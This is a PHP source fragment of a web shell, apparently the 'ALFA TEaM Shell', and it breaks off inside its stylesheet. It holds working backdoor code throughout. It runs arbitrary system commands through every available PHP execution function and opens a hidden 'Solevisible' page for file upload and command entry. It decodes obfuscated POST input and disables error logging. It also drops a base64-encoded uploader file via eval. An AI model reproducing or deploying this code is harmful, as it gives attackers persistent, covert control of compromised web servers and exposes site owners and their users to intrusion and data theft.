function alfaEx($in,$re=false,$cgi=true,$all=false){
  $data = _alfa_php_cmd($in,$re);
  if(empty($data)&&$cgi||$all){
    if($GLOBALS['sys']=='unix'){
      if(strlen(_alfa_php_cmd("whoami"))==0||$all){
        $cmd = _alfa_cgicmd($in);
        if(!empty($cmd)){
          return $cmd;
        }
      }
    }
  }
  return $data;
}
function _alfa_php_cmd($in,$re=false){
$out='';
try{
if($re)$in=$in." 2>&1";
if(function_exists('exec')){
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')){
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(function_exists("popen")&&function_exists("pclose")){
if(is_resource($f = @popen($in,"r"))){
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
}elseif(function_exists('proc_open')){
$pipes = array();
$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
$out=@stream_get_contents($pipes[1]);
}elseif(class_exists('COM')){
$alfaWs = new COM('WScript.shell');
$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
$stdout = $exec->StdOut();
$out=$stdout->ReadAll();
}
}catch(Exception $e){}
return $out;
}
function _alfa_fsockopen($server,$uri,$post){
  $socket = @fsockopen($server, 80, $errno, $errstr, 15);
  if($socket){
    $http = "POST {$uri} HTTP/1.0\r\n";
    $http .= "Host: {$server}\r\n";
    $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
    $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $http .= "Content-length: " . strlen($post) . "\r\n";
    $http .= "Connection: close\r\n\r\n";
    $http .= $post . "\r\n\r\n";
    fwrite($socket, $http);
    $contents = "";
    while (!@feof($socket)) {
      $contents .= @fgets($socket, 4096);
    }
    list($header, $body) = explode("\r\n\r\n", $contents, 2);
    @fclose($socket);
    return $body;
  }else{
    return "";
  }
}
if(isset($_GET["solevisible"])){
@error_reporting(E_ALL ^ E_NOTICE);
echo '<html>';
echo "<title>Solevisible Hidden Shell</title>";
echo "<body bgcolor=#000000>";
echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
$safe_mode = @ini_get('safe_mode');
if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@alfaGetCwd()) . "/<br />";
echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
echo"<font color=#7CFC00>Disable functions : </font>";
$disfun = @ini_get('disable_functions');
if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
echo"<font color=red>";
echo "$disfun";
echo"</font><br>";
echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@alfaGetCwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
if(isset($_FILES['file'])){
if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
}
echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
<hr><pre>';
if(isset($_POST['command_solevisible'])){
if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
$solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
echo alfaEx($solevisible);
}
echo'</pre>
</body></html>';
exit;}
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
if(function_exists('set_magic_quotes_runtime')){
@set_magic_quotes_runtime(0);
}
foreach($_POST as $key => $value){
if(is_array($_POST[$key])){
$i=0;
foreach($_POST[$key] as $f) {
$f = trim(str_replace(' ', '+',$f));
$_POST[$key][$i] = decrypt_post($f);
$i++;
}
}else{
$value = trim(str_replace(' ', '+',$value));
$_POST[$key] = decrypt_post($value);
}
}
$default_action = 'FilesMan2';//'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(strtolower(substr(PHP_OS,0,3))=="win")
$GLOBALS['sys']='win';
else
$GLOBALS['sys']='unix';
$GLOBALS['home_cwd'] = @alfaGetCwd();
$GLOBALS["need_to_update_header"] = "false";
$GLOBALS['glob_chdir_false'] = false;
if(isset($_POST['c'])){
if(!@chdir($_POST['c'])){
  $GLOBALS['glob_chdir_false'] = true;
}
}
$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());
if($GLOBALS['glob_chdir_false']){
  $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
}
if($GLOBALS['sys'] == 'win'){
$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
}
if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
if(!function_exists("mb_strlen")){
  function mb_strlen($str, $c=""){
    return strlen($str);
  }
}
if(!function_exists("mb_substr")){
  function mb_substr($str, $start, $end, $c=""){
    return substr($str, $start, $end);
  }
}
define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
function alfahead(){
$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
if(!isset($_POST['ajax'])){
function Alfa_GetDisable_Function(){
$disfun = @ini_get('disable_functions');
$afa = '<span class="header_show_all">All Functions Accessible</span>';
if(empty($disfun))return($afa);
$s = explode(',',$disfun);
$s = array_unique($s);
$i=0;
$b=0;
$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
$black_list = array();
$allow_list = array();
foreach($s as $d){
  $d=trim($d);
  if(empty($d)||!is_callable($d))continue;
  if(!function_exists($d)){
    if(in_array($d,$func)){
      $dis .= $d." | ";$b++;
      $black_list[] = $d;
    }else{
      $allow_list[] = $d;
    }
    $i++;
  }
}
if($i==0)return($afa);
if($i <= count($func)){
$all = array_values(array_merge($black_list, $allow_list));
return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
}
return('<span class="disable_functions">'.$dis.'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
}
function AlfaNum(){
$args = func_get_args();
$alfax = array();
$find = array();
for($i=1;$i<=10;$i++){
$alfax[] = $i;
}
foreach($args as $arg){
$find[] = $arg;
}
echo '<script>';
foreach($alfax as $alfa){
if(in_array($alfa,$find))
continue;
echo 'alfa'.$alfa."_=";
}
echo '""</script>';
}
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
$totalSpace = $totalSpace?$totalSpace:1;
$on="<span class='header_on'> ON </span>";
$of="<span class='header_off'> OFF </span>";
$none="<span class='header_none'> NONE </span>";
if(function_exists('ssh2_connect'))
$ssh2=$on;
else
$ssh2=$of;
if(function_exists('curl_version'))
$curl=$on;
else
$curl=$of;
if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
$mysql=$on;
else
$mysql=$of;
if(function_exists('mssql_connect'))
$mssql=$on;
else
$mssql=$of;
if(function_exists('pg_connect'))
$pg=$on;
else
$pg=$of;
if(function_exists('oci_connect'))
$or=$on;
else
$or=$of;
if(@ini_get('disable_functions'))
$disfun=@ini_get('disable_functions');
else
$disfun="All Functions Enable";
if(@ini_get('safe_mode'))
$safe_modes="<span class='header_off'>ON</span>";
else
$safe_modes="<span class='header_on'>OFF</span>";
$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
if(@ini_get('open_basedir')){
$basedir_data = @ini_get('open_basedir');
if(strlen($basedir_data)>120){
$open_b=substr($basedir_data,0, 120)."...";
}else{
$open_b = $basedir_data;
}
}else{$open_b=$none;}
if(@ini_get('safe_mode_exec_dir'))
$safe_exe=@ini_get('safe_mode_exec_dir');
else
$safe_exe=$none;
if(@ini_get('safe_mode_include_dir'))
$safe_include=@ini_get('safe_mode_include_dir');
else
$safe_include=$none;
if(!function_exists('posix_getegid'))
{
$user = function_exists("get_current_user")?@get_current_user():"????";
$uid = function_exists("getmyuid")?@getmyuid():"????";
$gid = function_exists("getmygid")?@getmygid():"????";
$group = "?";
}else{
$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
$cach_cwd_path = "";
for($j=0; $j<=$i; $j++){
$cwd_links .= $path[$j].'/';
$cach_cwd_path .= $path[$j].'/';
}
$cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/</a>";
}
$drives = "";
foreach(range('a','z') as $drive)
if(@is_dir($drive.':\\'))
$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
$csscode ='  -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..</title>
<style type="text/css">';?>
.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab img{width:10px;vertical-align:middle;margin-left:5px}#filesman_tabs .filesman_tab,#options_window .content_options_holder .options_tab .tab_name,.editor-tab-name,.sql-tabs .sql-newtab,.sql-tabs .sql-tabname,.terminal-tabs .terminal-tab{display:inline-block;background-color:#133d51;border-radius:4px;padding:5px;color:#fff;margin-right:3px;padding:5px;cursor:pointer;margin-bottom:1px;transition:background-color .5s}#filesman_tabs .filesman_tab{min-width:55px;text-align:center}#filesman_tabs .filesman_tab:hover,#options_window .content_options_holder .options_tab .tab_name:hover,.editor-tab-name:hover,.sql-tabs .sql-tabname:hover,.terminal-tabs .terminal-tab:hover{background-color:#a23939}.editor-tabs,.sql-tabs,.terminal-tabs{padding:5px;overflow-x:auto;white-space:nowrap}.options-loader-holder{position:absolute;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:11}.options-loader-holder img{position:absolute;top:32%;left:45%;transform:translate(-50%,-50%);width:100px;animation:spin 2s infinite}#filesman_tabs .filesman_tab.filesman-tab-active,#options_window .content_options_holder .options_tab .tab_name.tab_is_active,.editor-tab-name.editor-tab-active,.sql-tabname.sql-active-tab,.terminal-tab.active-terminal-tab{background-color:#009688}.tab-is-done{animation:2s tab_change_color infinite step-end}.stopAjax{color:#fff;font-size:20px;display:inline-block;padding:10px;cursor:pointer}#a_loader{display:none;position:fixed;top:0;left:0;width:100%;height:100%;background:#2b2626c7;z-index:99}.fmanager-row>td{position:relative}.fmanager-row .symlink_path{position:fixed;max-width:100%;background-color:#0f304a;border-radius:10px;font-size:15px;padding:8px;color:#fdf4f4;border:1px solid #8a8a8a;z-index:1;pointer-events:none}.archive-icons{vertical-align:middle}.archive-type-dir{font-weight:bolder}.archive-type-file{font-weight:unset}.archive-name{cursor:pointer}.archive_dir_holder a{color:#0f0;font-weight:bolder;cursor:pointer}.archive_dir_holder a:hover{color:#fff}.editor-content{height:100%}.editor-content-holder{height:90%}.editor-contents{display:none;position:relative;height:100%}.editor-contents.editor-content-active{display:block}.history-panel-controller{position:absolute;color:#fff;padding:10px;z-index:1000;border-radius:10px;top:50%;left:19%;background-color:#009687;cursor:pointer}.sql-content{display:none;position:relative;min-height:300px}.sql-content.sql-active-content{display:block}.pages-holder{padding:7px}.pages-number{display:inline-block;margin-left:10px}.pages-holder .pages-number a.page-number{padding:5px;background:#0f304a;margin-right:8px;cursor:pointer;width:33px;display:inline-block;text-align:center;border-radius:5px;color:#fff;transition:background .5s}.active-page-number{background:#10925c!important}.pages-number a.page-number:hover{background:#8a8a8a}.terminal-content{height:100%}.terminal-content,.terminal-tab{display:none}.terminal-content.active-terminal-content{display:block;position:relative}.terminal-btn-fontctl{background:#009688;width:50px;color:#fff;font-weight:bolder;outline:0;cursor:pointer}.alert-area{max-height:100%;position:fixed;bottom:5px;left:20px;right:20px;z-index:9999}.alert-box{font-size:16px;color:#fff;background:rgba(0,0,0,.9);line-height:1.3em;padding:10px 15px;margin:5px 10px;position:relative;border-radius:5px;transition:opacity .5s ease-in;-webkit-animation:alert-shake .5s ease-in-out;animation:alert-shake .5s ease-in-out}.alert-content-title{font-weight:700}.alert-box.alert-success{background:rgba(56,127,56,.89)}.alert-error{background:rgba(191,54,54,.89)}.alert-box.hide{opacity:0}.alert-close{background:0 0;width:12px;height:12px;position:absolute;top:15px;right:15px}.alert-close:after,.alert-close:before{content:"";width:15px;border-top:solid 2px #fff;position:absolute;top:5px;right:-1px;display:block}.alert-close:before{transform:rotate(45deg)}.alert-close:after{transform:rotate(135deg)}.alert-close:hover:after,.alert-close:hover:before{border-top:solid 2px #d8d8d8}@media (max-width:767px) and (min-width:481px){.alert-area{left:100px;right:100px}}@media (min-width:768px){.alert-area{width:350px;left:auto;right:0;z-index:9999}}@keyframes tab_change_color{0%{background-color:#133d51}50%{background-color:green}}@-webkit-keyframes alert-shake{0%{-webkit-transform:translateX(0)}20%{-webkit-transform:translateX(-10px)}40%{-webkit-transform:translateX(10px)}60%{-webkit-transform:translateX(-10px)}80%{-webkit-transform:translateX(10px)}100%{-webkit-transform:translateX(0)}}@keyframes alert-shake{0%{transform:translateX(0)}20%{transform:translateX(-10px)}40%{transform:translateX(10px)}60%{transform:translateX(-10px)}80%{transform:translateX(10px)}100%{transform:translateX(0)}}.textEffect{position:absolute;width:500px;top:-10px;animation:alert-shake .5s 